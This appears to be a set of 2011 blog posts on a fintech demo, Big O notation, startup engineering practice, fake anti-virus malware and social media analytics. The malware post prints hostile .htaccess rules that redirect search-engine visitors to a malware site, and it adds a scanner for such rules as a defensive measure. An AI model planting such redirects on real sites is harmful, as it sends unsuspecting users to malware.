Finovate Spring 2011 and the 3G Blood Bath

Yaacov Apelbaum-Billboard Finovate Spring 2011

Several weeks ago, I had the opportunity to demo at Finovate Spring 2011.  In the past, I have presented at a variety of professional conferences (including Microsoft PDC and IEEE), but preparing and presenting at Finovate was a real eye-opener for me.

In our presentation, I showcased the platform through several complex interactions. As an illustration, we decided to follow a “day in the life of an average teenage user”.  Our user, while cruising around town, utilized his mobile device (a Google Nexus-S running Android 2.3) to perform the following functions:

  1. Acquire product information by scanning the barcode with the built-in camera.
  2. Receive budgetary advice (“You don’t have enough money in your account to buy this camera. Would you like to create a goal for it?”).
  3. Create goals on the fly, and post them to a social network. (“Hey everyone, my birthday is coming up. I only need $20 more to buy this great camera!”)
  4. Get a chip-in from a member of his social network (who clicked on the Facebook link, was taken to the chip-in page, and used a credit card to contribute $20).
  5. Locate the best retail deal and store based on price, availability, and location, utilizing the phone’s geolocation ability.
  6. Complete the transaction at the retail POS using the phone’s NFC capability.

In addition to actually demoing all of these features, I had to allocate enough time during the presentation to talk about data security, encryption, and authentication, as well as to explain how the real-time analytics and business intelligence engines monitored and interacted with the user.

If you’ve never been to Finovate, then you might not know that the demonstrations are attended by the cream of the crop of financial innovators and the banking industry. You can’t pull the wool over their eyes; they’re too savvy, and your demo has to be perfect. For many Fintech startups, a successful Finovate demo is one of the best ways to get their name around, secure a major strategic partnership, and even get VC funding.

Yaacov Apelbaum-Finovate Spring 2011 Presentation 1 Yaacov Apelbaum-Finovate Spring 2011 Presentation 2

This year, there were over 850 people in the audience; the place was packed. Due to the condensed nature of the conference, each demo was required to be exactly 7 minutes long. When your 7 minutes are up, the bell rings, the lights go off, and you get swiftly kicked off the stage to clear room for the next presenter.

The whole event is a strange combination of high-tech magic show, circus act, and speed dating. Following the philosophy that there is no such thing as bad press, it’s not unusual to have presenters accompany their product demo with a ukulele solo or a juggling act.

Knowing how challenging the time and content delivery requirements were, we laid out the demo components eight weeks before the presentation and then on a daily basis, we spent an hour practicing it in front of our peers.  As the rehearsals progressed, we improved our timing, streamlined the script, and tweaked the presentation to make it more concise.

The day before the conference, we arrived at the presentation hall and got on stage for the final dress rehearsal and to test the AV equipment and connectivity.

Yaacov Apelbaum-Finovate 2011 Presenter List

During the rehearsal, as I placed the presentation phone on the podium, I noticed that it suddenly lost the 3G network signal. I moved the phone off the podium and the signal came back. Clearly, you can’t run a live demo if you don’t have connectivity. Backstage after the rehearsal, I ran into the network guy and asked him why there was such poor 3G connectivity on stage. The man just shrugged his shoulders and said, “It’s a metal building. Your best bet is to connect to the Finovate wireless network tomorrow.”

The next day, thirty minutes before our 1:16 PM demo, we arrived backstage to gear up. I again checked all connectivity and verified that I was still on the network. It didn’t occur to me to check which wireless network I was actually connected to.

After handing in all of our equipment to the Finovate staff, we stayed backstage and watched the presenters go at it. It turned out to be a blood bath.

One company demoing an iPhone version of their browser app was doing great until they tried to actually log in from the device (using 3G). After 30 seconds of failed attempts, they made the strategic decision to continue without the mobile app and instead narrated what the app was supposed to do.

Yaacov Apelbaum-Finovate Spring 2011 Conference

Another company demoing their revolutionary banking web portal (using a laptop with a 3G USB wireless network card) also went up in smoke as they soon discovered that they couldn’t log in to their own site. Their CTO, in an attempt to save the day (still apparently thinking it was some kind of misconfiguration issue), tried to reconfigure the proxy settings on his laptop, forgetting that he was sharing his screen with 850 people. The audience got treated to his administrative user ID, password, and firewall settings.

This went on and on. One after another, the 3Gers went down like flies. Almost every iPhone app demo using 3G ended up with some critical connectivity problem.

Then, it was our turn. I got on stage and instinctively looked at the wireless network one more time. To my horror, I noticed that I had almost no reception and that my laptop was connected to a network called “Coffee House”. “Strange,” I thought to myself, “why would Finovate name their network ‘Coffee House’?” It took me another few seconds to realize that I was connected to the wrong network. Next, I looked at the demo phone, which was still connected to the “Finovate” network. You can’t run a demo with only fifty percent connectivity!

As the announcer was introducing us, I noticed a LAN cable on the podium. Figuring that at that point I had nothing to lose, I plugged it into my laptop and quickly launched the browser. After what seemed like an eternity, and just as my partner began the presentation, the home page loaded. What a close call!

Our demo itself went down like a fine Merlot. The pages loaded instantly, the phone transmitted without any issues, and we even finished presenting with a few seconds to spare.  On the way out, I asked the network technician why he hadn’t warned all the presenters that the 3G was flaky. He looked at me with a twinkle in his eye and pointed at a large sign on the wall that read:

“To all presenters, due to the fact that we are located in a metal building and can’t guarantee 3G connectivity on stage, please utilize the Finovate wireless network! We will be happy to configure your devices for you.”

 

© Copyright 2011 Yaacov Apelbaum All Rights Reserved.


Big O Notation

Yaacov Apelbaum-big-o-and-efficiency

Recently, I was chatting with a friend of mine about pre-acquisition due diligence.  Charlie O’Rourke is one of the most seasoned technical executives I know. He’s been doing hardcore technology for over 30 years and is one of the pivotal brains behind FDC’s multi-billion dollar payment processing platforms.  The conversation revolved around a method he uses for identifying processing bottlenecks.
 
His thesis was that in a world where you need to spend as little as you can on an acquisition and still turn a profit quickly, problems of poor algorithmic implementation are “a good thing to have”, because they are relatively easy to identify and fix. This is true, assuming that you have his grasp of large volume transactional systems and you are handy with complex algorithms.

In today’s environment of rapid system assembly via the mashing of frameworks and off-the-shelf functionality like CRM or ERP, the mastery of data structures by younger developers is almost unheard of.

It’s true, most developers will probably never write an algorithm from scratch. But sooner or later, every coder will have to either implement or maintain a routine that has some algorithmic functionality. Unfortunately, when it comes to efficiency, you can’t afford to make uninformed decisions, as even the smallest error in choosing an algorithm can send your application screaming in agony to Valhalla.

So if you have been suffering from recursive algorithmic nightmares, or have never fully understood the concept of algorithmic efficiency (or plan to interview for a position on my team), here is a concise primer on the subject.

First let’s start with definitions.

Best or Bust:
An important principle to remember when selecting algorithms is that there is no such thing as the “best algorithm” for all problems. Efficiency will vary with data set size and availability of computational resources (memory and processor). What is trivial in terms of processing power for the NSA could be prohibitive for the average Joe.

Efficiency:
Algorithmic efficiency is the measure of how well a routine can perform a computational task. One analogy for algorithmic efficiency and its dependence on hardware (memory capacity and processor speed) is the task of moving a ton of bricks from one location to another a mile away. If you use a Lamborghini for this job (small storage but fast acceleration), you will be able to move a small number of bricks very quickly, but the downside is that you will have to repeat the trip multiple times. On the other hand, if you use a flatbed truck (large storage but slow acceleration), you will be able to complete the entire project in a single run, albeit at a slower pace.

Notation:
The expression for algorithmic efficiency is commonly referred to as “Big O” notation. This is a mathematical representation of how an algorithm’s running time or memory use grows as the size of its input grows. When plotted as a function, algorithms will remain flat, grow steadily, or follow varying curves.

The Pessimistic Nature of Algorithms:
In the world of algorithm analysis, we always assume the worst case scenario.  For example, if you have an unsorted list of unique numbers and it’s going to take your routine an hour to go through it, then it is possible in the best case scenario that you could find your value on the first try (taking only a minute). But following the worst case scenario theory, your number could end up being the last one in the list (taking you the full 60 minutes to find it). When we look at efficiency, it’s necessary to assume the worst case scenario.

 Yaacov Apelbaum-big-o Plot
Image 1: Sample Performance Plots of Various Algorithms

O(1)

Performance is constant in time (processor utilization) or space (memory utilization) regardless of the size of the data set on which the algorithm operates. When viewed on a graph, these functions show no growth curve and remain flat.

An example of this type of algorithm is testing the value of a variable against a predefined hash table. The single lookup involved in this operation eliminates any growth curve.
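As a minimal sketch of the hash table case, a Python dictionary can stand in for the predefined table. The table contents and the function name below are illustrative assumptions, and the constant-time behavior is the average case for a hash lookup.

```python
# Hypothetical lookup table; the keys and values are illustrative only.
STATUS_TEXT = {200: "OK", 301: "Moved Permanently", 404: "Not Found"}


def status_text(code):
    """Return the text for a status code using a single hash lookup."""
    # One lookup, no matter how many entries the table holds.
    return STATUS_TEXT.get(code, "Unknown")
```

Adding more entries to the table does not add more steps to the lookup, which is why the curve stays flat.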

O(n)
Performance will grow linearly and in direct proportion to the size of the input data set.

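O(2N) or O(10 + 5N) denote that some constant overhead from specific business logic has been blended with the implementation (which should be avoided if possible). Because Big O notation drops constant factors and constant terms, both still simplify to O(N).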

O(N+M) is another way of saying that two data sets are involved, and that their combined size determines performance.

An example of this algorithm is finding an item in an unsorted list or a Linear Search that goes down a list, one item at a time, without jumping.  The time taken to search the list gets bigger at the same rate as the list does.
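A short sketch of a Linear Search that also counts its comparisons makes the best and worst cases easy to see. The function name and the comparison counter are additions for illustration.

```python
def linear_search(items, target):
    """Return (index, comparisons); index is -1 if target is absent."""
    comparisons = 0
    for index, value in enumerate(items):
        comparisons += 1
        if value == target:
            return index, comparisons
    # Worst case: every element was examined.
    return -1, comparisons
```

In the best case the target is the first element and one comparison is enough; in the worst case (last element, or not present at all) the number of comparisons equals the length of the list.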

O(n^2)
Performance will be directly proportional to the square of the size of the input data set. This happens when the algorithm processes each element of a set and that processing requires another pass through the set (hence the squared value). Deeper nesting of inner loops results in the forms O(N^3), O(N^4), and so on.

Examples of this type of algorithm are Bubble Sort, Selection Sort, and Insertion Sort, as well as Shell Sort (with its original gap sequence) and Quicksort in their worst cases.
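To make the nested pass visible, here is a plain, unoptimized Bubble Sort sketch that counts its comparisons. The counter is an addition for illustration only.

```python
def bubble_sort(items):
    """Return (sorted_copy, comparisons) using an unoptimized Bubble Sort."""
    data = list(items)
    comparisons = 0
    n = len(data)
    for i in range(n - 1):          # outer pass over the data set
        for j in range(n - 1 - i):  # inner pass for each outer pass
            comparisons += 1
            if data[j] > data[j + 1]:
                data[j], data[j + 1] = data[j + 1], data[j]
    return data, comparisons
```

This version always performs N(N-1)/2 comparisons, so doubling the input from 10 to 20 items raises the count from 45 to 190, roughly four times as many.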

O(2^n)
Processing growth (data set size and time) will double with each additional element of the input data set. The execution time of an O(2^N) algorithm grows exponentially.

The 2 indicates that time or memory doubles for each new element in data set.  In reality, these types of algorithms do not scale well unless you have a lot of fancy hardware.
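One common source of this kind of doubling is enumerating every subset of a data set. The sketch below is an illustrative example chosen for this primer, not a routine from any particular system.

```python
def all_subsets(items):
    """Return every subset of items; the result has 2**len(items) entries."""
    subsets = [[]]
    for item in items:
        # Each new element doubles the number of subsets collected so far.
        subsets += [subset + [item] for subset in subsets]
    return subsets
```

Three elements produce 8 subsets and ten elements produce 1,024, so both time and memory double with every element added.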

O(log n) and O(n log n)
Processing is iterative, and growth curves rise quickly at the beginning of the execution and then slowly taper off as the size of the data set increases. For example, if a data set contains 10 items, it will take one second to complete; if the data set contains 100 items, it will take two seconds; if the data set contains 1000 items, it will take three seconds, and so on. Doubling the size of the input data set has little effect on its growth because after each iteration the data set will be halved. This makes O(log n) algorithms very efficient when dealing with large data sets.

Generally, log N implies log2(N), the base-2 logarithm, which refers to the number of times you can partition a data set in half, then partition the halves, and so on. For example, for a data set with 1024 elements, you would perform 10 lookups (log2(1024) = 10) before either finding your value or running out of data.

Lookup #   Initial Dataset   New Dataset
1          1024              512
2          512               256
3          256               128
4          128               64
5          64                32
6          32                16
7          16                8
8          8                 4
9          4                 2
10         2                 1
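The halving in the table can be reproduced with a few lines of code. The function name is an assumption made for this sketch.

```python
def halving_steps(size):
    """Count how many times size can be halved before one element remains."""
    steps = 0
    while size > 1:
        size //= 2  # keep only half of the remaining data set
        steps += 1
    return steps
```

For a data set of 1024 elements this returns 10, matching the ten rows of the table.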

A good illustration of this principle can be found in the Binary Search, which requires a sorted data set. It works by selecting the middle element of the data set and comparing it against the desired value to see if it matches. If the target value is higher than the value of the selected element, it will select the upper half of the data set and perform the comparison again. If the target value is lower than the value of the selected element, it will perform the operation against the lower half of the data set. The algorithm will continue to halve the data set with each search iteration until it finds the desired value or until it exhausts the data set.
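The description above can be sketched as follows. The lookup counter is an addition for illustration, and the input is assumed to be sorted in ascending order.

```python
def binary_search(sorted_items, target):
    """Return (index, lookups); index is -1 if target is absent."""
    low, high = 0, len(sorted_items) - 1
    lookups = 0
    while low <= high:
        mid = (low + high) // 2
        lookups += 1
        if sorted_items[mid] == target:
            return mid, lookups
        if sorted_items[mid] < target:
            low = mid + 1   # target can only be in the upper half
        else:
            high = mid - 1  # target can only be in the lower half
    return -1, lookups
```

On a sorted list of 1,024 elements, no search in this sketch needs more than about log2(N) + 1 lookups, compared with up to 1,024 for a Linear Search.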

The important thing to note about log2(N) type algorithms is that they grow slowly. Doubling N has a minor effect on their performance, and the logarithmic curves flatten out smoothly.

Examples of these types of algorithms are Binary Search, which is O(log N), and Heap Sort, Merge Sort, and Quicksort (in its average case), which are O(N log N).

Scalability and Efficiency
An O(1) algorithm scales better than an O(log N),
which scales better than an O(N),
which scales better than an O(N log N),
which scales better than an O(N^2),
which scales better than an O(2^N).

Scalability does not equal efficiency. A well-coded O(N^2) algorithm can outperform a poorly coded O(N log N) algorithm, but this is only true for certain data set sizes and processing times. At some point, the performance curves of the two algorithms will cross and their efficiency will reverse.
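A rough way to picture the crossover is to model each algorithm as a cost per step multiplied by its growth function and look for the first data set size where the quadratic one becomes more expensive. The cost constants below are hypothetical; real values would have to be measured.

```python
import math


def crossover_size(quadratic_cost, nlogn_cost, limit=1_000_000):
    """Return the smallest N >= 2 where quadratic_cost * N^2 exceeds
    nlogn_cost * N * log2(N), or None if that never happens up to limit."""
    for n in range(2, limit + 1):
        if quadratic_cost * n * n > nlogn_cost * n * math.log2(n):
            return n
    return None


# Hypothetical costs: the O(N log N) routine is 20 times slower per step.
print(crossover_size(quadratic_cost=1, nlogn_cost=20))
```

Below the returned size the "slower scaling" algorithm wins; above it, the O(N log N) routine pulls ahead and the gap keeps widening.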

What to Watch for when Choosing an Algorithm
The most common mistake when choosing an algorithm is the belief that an algorithm that was used successfully on a small data set will scale effectively to large data sets (factor 10x, 100x, etc.).

On small data sets, an O(N^2) algorithm like Bubble Sort will often work well enough. If you switch to a more complex O(N log N) algorithm like Quicksort, you are likely to spend a long time refactoring your code and will realize only marginal performance gains at that scale.

More Resources
For a great illustration of various sorting algorithms in live action form, check out David R. Martin’s animated demo. For more formal coverage of algorithms, check out Donald Knuth’s epic publication on the subject, The Art of Computer Programming, Volumes 1-4.

If you are looking for some entertainment while learning the subject, check out the AlgoRythmics series on sorting through dancing.

 

 


Scaling the Wall

Yaacov Apelbaum-Climbing

Eagerly beginning the wall to scale,
Using only my hands and feet.
Resolved to follow the hardest trail,
I confidently place my cleat.

Suddenly, there’s no foothold to rest,
Desperately, I cling to the wall.
My heart is pounding in my chest,
My ascent slows to a crawl.

My feet and arms tire and shake,
The safety line invites me to bail.
Should I reach for the line and forego the ache,
Or continue to try, maybe fail?

The voice from below says: “Look to the right”,
I reach and grab a far hold.
Propelling free from my previous plight,
Good advice is more precious than gold.

It’s romantic to view the world as a wall,
Scaled heroically by pure self-esteem.
But in complex endeavors you’re certain to fall,
Without the support of a team.

 


The Startup Leap to Success

Yaacov Apelbaum-The Startup Product Leap

One of the most challenging periods for any startup is passing through the “Valley of Death”. During this delicate phase, the organization’s burn rate is high and it has to rapidly achieve the following three goals:

  1. Move from a proof of concept (POC) to a functional commercial product
  2. Reach cash-flow break-even
  3. Transition from seed/angel funding to venture capital funding

For startups focusing on the development of SaaS products, this phase also marks an important milestone in the maturity of their product. With an increased volume of production users come stricter SLAs and the need to implement more advanced operational ability in areas such as change control, build automation, configuration management, monitoring, and data security.

Yaacov Apelbaum-Startup Financing Cycle

If you are managing the technology organization in an early stage startup, you have every reason to be concerned. To the outsider, the success and failure of startups often seem to be shrouded in mystery: part luck, part black magic. But ask a seasoned professional who has successfully gone through the startup meat grinder and he will tell you that success has nothing to do with luck, spells, or incantations.

Having worked with a number of startups, I have come to conclude that the most common reason for product failure (beyond just not being able to build a viable POC) is the inability to control your product’s stability and scalability.

In the words of Ecclesiastes, there is a time and purpose for everything under heaven. In the early stages of a startup’s life cycle, process is negotiable. Too much process may hinder the speed at which you can build a functional POC. In later stages, reliable processes and procedures (e.g. requirements, QA, unit testing, documentation, build automation, etc.) are critical. They are the very foundations of any commercial grade product. Poor quality and performance are self-evident, and no matter how much marketing spin and management coercion you use, if you are trying to secure an early stage VC funding round, your problems will rapidly surface during the due diligence process.

To avoid the startup blues, keep your eyes on the following areas. Factoring them into your deployment will help you deliver on time and on budget, with the proper scalability and highest quality possible.

Design Artifacts

  1. Before converting your POC to a functional product, take the time to design your core components (e.g. CRM, CMS, DB access, security, API, etc.). Create a high level design that identifies all major subsystems. Once you know what they are, zoom into each subsystem and provide a low level design for each of these as well.
  2. Resist the temptation to code core functionality before you have a solid and approved scalable architecture (and the documentation for it). 
  3. Let your team review and freely comment on the proposed platform architecture and deployment topology. Just because a vocal team member has religious technology preferences doesn’t mean that everyone should convert.
  4. No matter how good your technical staff is, when it comes to building complex core functionality (transaction engine, web services API, etc.), don’t give any single individual carte blanche to work in isolation without presenting their design to the entire team.
  5. Document the product as you develop it. Building a complex piece of software without accurate documentation is akin to trying to operate a commercial jet without its flight manual.
  6. To help spread the information and knowledge, establish a company-wide document repository (like a Wiki or SharePoint) and store all your development and design documents under version control. Discourage anyone from keeping independent runaway documents of the system.
  7. Maintain an official (and versioned) folder for the platform documentation showing product structure and components, development roadmaps, and technical marketing materials. 

Testing and QA

  1. If you are not writing unit tests, you have no way to verify your product’s quality. Relying on QA to find your bugs means that by the time you do (if ever!) it will be too late and too expensive to fix them. Spend a little extra time and write unit tests for every line of code you deploy in production. When refactoring old code, update the original unit tests as well.
  2. Just like most things in life, bugs have a lifecycle: they are born, they live, and they die. Effectively tracking them as part of your build and QA process is a prerequisite for their timely resolution.
  3. If you are discovering a high critical bug count in your “code complete release” (e.g. half a percent of the line count, or 500 bugs for a 100,000-line code base), you may not be production ready. Stop further deployment and conduct a thorough root cause analysis to understand why you have so many issues.
  4. If your bug opening/closure rate remains steady (i.e. QA is opening bugs at the same rate development is closing them) and you have recurring bug bounces, you may need to reassess the competency of your development resources. This would also be a good time to have a serious heart-to-heart conversation with the developers responsible for the bugs. Be prepared for some tough HR decisions.
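The half-percent rule of thumb from item 3 is easy to turn into a release gate. The sketch below assumes the threshold is a simple ratio of critical bugs to lines of code; the function names and the default threshold parameter are illustrative.

```python
def critical_bug_density(critical_bugs, lines_of_code):
    """Return critical bugs per line of code."""
    if lines_of_code <= 0:
        raise ValueError("lines_of_code must be positive")
    return critical_bugs / lines_of_code


def is_production_ready(critical_bugs, lines_of_code, threshold=0.005):
    """Return False once the density reaches the threshold (0.5% by default)."""
    return critical_bug_density(critical_bugs, lines_of_code) < threshold


# 500 critical bugs in a 100,000-line code base hits the 0.5% mark.
print(is_production_ready(500, 100_000))
```

A check like this could run as part of the build so that a release candidate crossing the line triggers the root cause analysis rather than a deployment.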

Monitoring and Verification

  1. Just like you wouldn’t drive a car without a functional dashboard, you can’t run quality commercial software without real time visibility into its moving parts. Implement a monitoring dashboard to track items such as daily builds (and breaks), server performance, user transactions, DB table space, etc.
  2. Seeing is believing. Products like Splunk can help you aggregate your operational data.  Once you have this information, show it to your entire team. I personally like to pump it onto a large screen monitor in the development areas so everyone can get a glimpse.

Yaacov Apelbaum-Splunk Monitoring

Image 1: Splunk Dashboard in Action

Security, Scalability and Operations

  1. Unless you are in the snake oil sales business, build your production environment from the get-go for scalability, security, and redundancy. Don’t look for “bargains” on these technologies; leverage commercial-grade load balancers, firewalls, and backup solutions.
  2. Your production environment is critical to your success, so don’t treat it as a second class citizen or try to manage it with part time resources. As you will quickly discover, a dedicated sys admin and a DBA who know your platform intimately are worth their weight in gold.
  3. You must achieve operational capabilities in build automation, release management, bug tracking, and configuration management before going live.  If you don’t, be prepared to spend most of your productive time fixing boo-boos in the wee hours of the night.

Implementing many of the above mentioned measures will give you a significant tactical advantage as well as a strategic boost when negotiating with potential VCs. Having these capabilities on your utility belt will also help you calmly face any future issues as your startup matures.

 


The Anti-Virus Virus Part II

Yaacov Apelbaum-ER Anti-Virus Virus

In the Anti-Virus Virus, I described how certain commercially produced malware propagates via specialty web sites that have been SEO’d to rank at the top of search engine results.

In this posting I will try to identify who is responsible for the malware authorship, its marketing and its distribution.

As a quick refresher: the malware (a variety of bogus anti-virus applications) is downloaded when you click on a link in a page returned by a search engine. The redirect to the malicious download only occurs when a user arrives at the site by way of the search engine. At the heart of this exploit are legitimate websites that have been compromised to provide a redirect to the rogue downloads.

This exploit is interesting because in order for it to work, it requires the user to visit the site indirectly. If you navigate to the site via a bookmark or manually enter the address, it will not result in a redirect. This clever aspect of the tactic reduces the chance that the site’s owner will suspect that there is something wrong with his site, and thus delays its patching. Site administrators visiting their site directly will not see any evidence of the redirect. However, traffic coming from search engines (which forms the majority of visits) will keep getting redirected to the malware download.
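One way a site owner might check for this behavior is to request the same page with and without a search engine referrer and compare the responses. The sketch below only contains the comparison logic. The `fetch` callable is a hypothetical helper the caller would supply (it should not follow redirects), and `fake_fetch` is a stand-in that simulates a compromised site.

```python
def find_cloaked_referrers(fetch, url, referrers):
    """Return the referrers for which the response differs from a direct visit.

    fetch(url, referrer) is a hypothetical callable supplied by the caller.
    It should send `referrer` as the Referer header (or none when it is
    None) and return a (status_code, location_header) tuple.
    """
    direct = fetch(url, None)
    return [ref for ref in referrers if fetch(url, ref) != direct]


def fake_fetch(url, referrer):
    """Stand-in for a real HTTP client; simulates a compromised site."""
    if referrer and "google" in referrer:
        return 301, "http://malware.invalid/"
    return 200, None


suspects = find_cloaked_referrers(
    fake_fetch,
    "http://example.invalid/",
    ["http://www.google.com/search?q=test", "http://example.org/"],
)
print(suspects)
```

Any referrer in the returned list produced a different response than a direct visit, which is exactly the symptom a direct-visiting administrator would never see.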

The underlying technique of such an attack is a modification of the .htaccess file (found on the Apache web server). In some cases this file is replaced completely. In others, it is just modified to include some new rules. The modified .htaccess files will contain settings similar to the following:

 

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteRule .* http://malewaresite-omitted/ [R=301,L]

This basically means: redirect any users who arrive from Google, Yahoo, or MSN to “malewaresite”. In some cases, common error pages are also redirected by the .htaccess file, as in the following:

ErrorDocument 404 http://malewaresite-omitted/

The result of this re-route is that unsuspecting users get sent to sites pushing malware.

The root cause in most of these compromises is poor user access control, which results in compromised file and folder permissions on shared hosting servers. This allows compromised accounts on the same physical server to overwrite the .htaccess files in otherwise unrelated sites.
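For site owners who want to audit their own files, a simple heuristic scan can flag the kinds of rules described above. This is a rough sketch under stated assumptions: the list of search engine names is illustrative and not exhaustive, and legitimate external redirects will also be flagged, so every hit needs a manual review.

```python
import re

# Illustrative list of referrer keywords; not exhaustive.
SEARCH_ENGINE_HINTS = ("google", "yahoo", "msn", "bing")


def find_suspicious_rules(htaccess_text):
    """Return (line_number, reason, line) for rules worth a manual review."""
    findings = []
    for number, raw in enumerate(htaccess_text.splitlines(), start=1):
        line = raw.strip()
        lowered = line.lower()
        if lowered.startswith("rewritecond") and "http_referer" in lowered:
            # A condition keyed on a search engine referrer.
            if any(hint in lowered for hint in SEARCH_ENGINE_HINTS):
                findings.append((number, "referrer condition", line))
        elif re.match(r"(rewriterule|errordocument)\s", lowered):
            # A rewrite or error page that points at an absolute URL.
            if re.search(r"https?://", lowered):
                findings.append((number, "external redirect", line))
    return findings
```

Running it against each .htaccess file after a deployment, and comparing the results with a known-good copy, is one inexpensive way to notice an overwrite early.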

Source and Authorship

I loaded Process Monitor and installed the copy of Antivirus2010 on a quarantined Microsoft Virtual PC running Windows XP Professional. The installation created an entire registry hive that included several autoruns, browser search redirects, and a rootkit. I then fired up TCPView and examined the application’s outgoing communication. It didn’t take long before the malware opened a socket to a homing beacon and a list of staging and configuration servers, all of which were located in Russia and Ukraine (Moscow and Kiev). The domains associated with the servers were registered by Bakasoftware.com, which is currently hosted in Canada.

Interestingly, upon startup, the malware called the GetKeyboardLayout API and checked for the presence of the following keyboard layouts:

  • Russia
  • Czech Republic
  • Ukraine
  • Belarus
  • Estonia
  • Latvia
  • Lithuania

If it found one, it terminated itself, which is further proof that the designers targeted English-speaking users. The analysis of the binaries also confirmed that they were compiled and linked using Russian regional settings.

Marketing and Distribution

For software to be commercially viable, it must have effective marketing and distribution channels. The bogus Antivirus is no exception. It turns out that even a few US companies have been associated with the distribution of this software. Several of them have been named as defendants in the Federal Trade Commission’s complaint. Some of these include Innovative Marketing, Inc., a US company registered in Belize, and ByteHosting Internet Services, LLC of Ohio, in addition to other American distributors including James Reno, Sam Jain, Daniel Sundin, Marc D’Souza, and Kristy Ross.

The Federal Trade Commission argued that the defendants have used complex online advertising techniques that violate the fair trade law in order to push a large number of fake security or system maintenance products including “WinFixer, WinAntivirus, DriveCleaner, WinAntispyware, ErrorProtector, ErrorSafe, SystemDoctor, AdvancedCleaner, Antivirus XP, and Antivirus 2008, 2009, 2010”.

We can gain a better glimpse into a typical malware distribution operation by examining the profile of Jain Shaileshkumar, a.k.a. Sam Jain. Mr. Jain is an internet entrepreneur and former CEO of the affiliate marketing network eFront. In 2005 he was ordered to pay $3.1 million to Symantec for selling counterfeit software and violating various IP laws. Jain operated several Internet-based companies including Discount Bob, Shifting Currents Financials, Inc., Innovative Marketing, Inc., Professional Management Consulting Inc., and Shopenter.com, LLC.

In December 2008, Jain was listed as a defendant in the Federal Trade Commission’s case against so-called “Scareware” applications such as WinFixer. The case alleges that several companies scammed consumers into buying these applications through malware and banner ads.

According to court records, as of February 11, 2009, Jain is officially listed as a fugitive from justice in the United States.

Affiliate Program

The affiliate program is made up of a network of associates. Once a member the likes of Sam Jain is accepted into the program, he is given access to an enterprise control panel that lets him distribute different flavors of malware, as well as a number of techniques for infecting internet-connected computers. Affiliates can make between 58 and 90 percent commission on sales of the software. Such generous commissions can explain why these types of malware products are so popular among spammers.

Yaacov Apelbaum-Bakasoftware Control Panel

Image 1: Bakasoftware Malware Administrative Download Control Panel

In a true testament to their sophistication, the affiliate members have access to a web-based statistics dashboard. In it, the franchise owner can view KPIs that include the number of daily installs, the number of purchases by victim (and his CC number), refunds (chargebacks), and commissions. With such access to real-time sales analytics, they are the envy of many Fortune 500 sales organizations.

Yaacov Apelbaum-Bakasoftware Sales Dashboard

Table 1: Bakasoftware Malware Sales Dashboard

As you can see from Table 1, one affiliate installed 154,825 editions of the software in exactly 10 days and managed to get 2,772 of those to buy the cure. Any commission sales rep will tell you that a conversion rate of under 2% is very low, but with such a high commission structure, the affiliate was able to earn $146,525.25. A straight-line projection of this earning rate would generate roughly 5.3 million dollars a year. That’s some pocket change.
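The figures quoted from Table 1 can be sanity-checked with a few lines of arithmetic. The only assumption added here is that the 10-day earning rate continues unchanged for 365 days.

```python
# Figures quoted from Table 1.
installs = 154_825
purchases = 2_772
earnings_usd = 146_525.25
period_days = 10

conversion_rate = purchases / installs          # fraction of installs that paid
earnings_per_sale = earnings_usd / purchases    # average commission per sale
# Assumption: the same daily rate holds for a full 365-day year.
annual_projection = earnings_usd / period_days * 365

print(f"conversion rate:   {conversion_rate:.2%}")
print(f"earnings per sale: ${earnings_per_sale:,.2f}")
print(f"annual projection: ${annual_projection:,.2f}")
```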

Who says that crime doesn’t pay?

Social Network Analytics – Myth v. Reality

Yaacov Apelbaum-Social Networks Analytics Mysterey and Deception

It may not be obvious, but social networks (SN) have numerous applications that go beyond simple socialization. Besides the voyeuristic and self-promoting aspects, SN data is brimming with fresh, cheap, and accurate target information. This includes age, demographics, purchasing habits, buying power, education, brand loyalty, influence, and income, just to name a few.

This is pretty powerful stuff, as the insight that can be gleaned from millions of users posting in near real-time could revolutionize the way products are launched and marketing decisions are made. It’s no longer necessary to guess what buzzwords will resonate with users for your next campaign, because users are already using those words in their public conversations. There’s no longer a reason to take a spray-and-pray advertising approach in the hopes that an ad will be seen by a fraction of the right buyers. Now, you can easily determine where your target population hangs out and pursue them directly.

So with such promise to disrupt the market, why hasn’t big soft moved into this space yet? Where are products like the Microsoft Social Media Analytics Server or the IBM Social Network BI Aggregator? After all, large-volume data analytics has been around for quite some time. Over the past 20 years, giants like Microsoft, IBM, and Oracle have invested billions of dollars in developing enterprise analytics and decision-making solutions. Why not adapt their existing platforms to harvest the Internet through the cloud?

Yaacov Apelbaum-Stats up and down

The answer to these questions has a lot to do with the problem of low data quality and inconsistency.  A close examination of blog, forum, Twitter, or Facebook data reveals a hodgepodge of tidbits of personal information, non-threaded conversations, and poorly typed, misspelled, and badly formatted communications, which renders it virtually useless for structured analytical engines.

You may argue that at least some of the SN analytics companies must be doing something right.  That may be so, but there is no quantifiable way to gauge how much of their analytics is based on real math and how much is snake oil salesmanship.  Many of the SN analytics providers claim that they developed patented technology to sort through volume, noise, and poor data quality. Others insist that their “secret sauce” algorithms allow them to calculate engagement, find patterns, and even accurately track memetic propagation. Most of these claims are dubious at best.  There are many reasons for this, but the operative ones are:

1. Most SN analytics providers don’t harvest their own data, and those that do certainly don’t do so in real-time. Rather, they subscribe to data scraping services like Compete, comScore, Hitwise, Nielsen, Quantcast, etc. The data harvesters only collect data from a small fraction of the relevant websites, blogs, or forums, and they do so on a schedule that could be as long as two weeks.  Obviously, password-protected and membership-only sites are not included.  What you get, then, is a tiny fraction of a weighted sample population that could be weeks old.

2. Companies that scrape platforms like Facebook or Twitter do it via a native API. Due to system performance concerns, the SN sites throttle the amount of data they expose via the API.  If you are looking at a real-time monitoring solution for any of the social networks, be prepared to have very large data gaps and timeouts in your dashboard.

3. Algorithms for determining text sentiment, theme, and the writer’s sex, age, and education are only effective on large and well-formatted compositions. They were designed to work on structured essays that are around 1,000 words long. The likelihood of accurately determining any of these characteristics from a 140-character tweet or a blog posting that is riddled with expressions like LOL or OMG is no better than a coin toss.

4. Even the largest data providers scrape less than 1 percent of relevant Internet data. The analytics you are viewing probably represent information found across no more than a handful of sites, blogs, or forums.  Making multimillion-dollar advertising decisions based on such low-quality and small data sets could be very risky.

5. Due to the growing availability of automated tools for the creation of blogs, websites, and posts, we are starting to see a significant amount of machine-generated content that is designed to pump up SEO visibility for adware sites.  Data scrapers are unable to distinguish between machine-generated and human-typed content, which can result in skewed analytics.

